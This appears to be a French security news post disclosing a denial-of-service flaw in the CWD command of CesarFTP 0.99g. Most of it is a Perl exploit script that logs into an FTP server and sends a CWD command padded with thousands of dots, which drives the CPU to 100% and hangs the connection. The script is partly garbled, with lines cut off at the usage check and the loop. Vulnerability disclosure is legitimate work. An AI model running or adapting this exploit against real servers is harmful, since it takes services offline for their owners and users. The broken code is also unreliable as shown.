Faille de securite dans CesarFTP 0.99g Posted on Monday, December 22 @ 02:33:10 CET
Topic: Securité
|
Le serveur CesarFTPv0.99g (http://www.aclogic.com/) presente une faille de securite dans la commande CWD. Cette derniere affecte les ressources CPU lorsque l'on lui envoi la sequence :
CWD ..................Longue sequence de points(10000 par exemple)....
L'utilisation du CPU avoisine les 100%, et la connexion ne repond plus.
Tester sur Windows XP. Les versions anterieurs a la 0.99g sont probablement aussi vulnerable.
A la suite : Fichier perl permettant de tester cette faille
--------cesar0.99g_dos.pl---------------------------------------------------
#!/usr/bin/perl -w
use IO::Socket;
########################################
# _ _
# ____ (_) | |__
# |_ / | | | '_
# / / | | | |_) |
# /___| |_| |_.__/
#
# http://coding.romainl.com/
#
########################################
##
########################################
## tested on CesarFTP 0.99g + WindowsXP Sp1
##
## server : 127.0.0.1
## user : zib
## pass : zib
##
##$ perl expl.pl localhost zib zib
##
##server : localhost
##user : zib
##pass : zib
##
##[~] prepare to connect...
##[+] connected
##[~] prepare to send data...
##[+] success
##[~] Send CPU Overload Sequence...
##[+] CPU Overload Sequence sent
##$
########################################
if (@ARGV
";
print "
";
print " - host for attack
";
print " - a valid ftp user account, could be anonymous
";
print " - pass for the login
";
print "#############################################################";
exit();
}
$server = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$nb = 10000;
print "
";
print "server : $server
";
print "user : $user
";
print "pass : $pass
";
print "
";
$i = 0;
print "[~] prepare to connect...
";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort
=> "21") ||
die "[-] connect failed
";
print "[+] connected
";
print "[~] prepare to send data...
";
print $socket "USER $user
";
print $socket "PASS $pass
";
print "[+] success
";
print "[~] Send CPU Overload Sequence...
";
print $socket "CWD ";
for($i=0;$i
|
|
| |
| Article Rating | Average Score: 0 Votes: 0
| |
|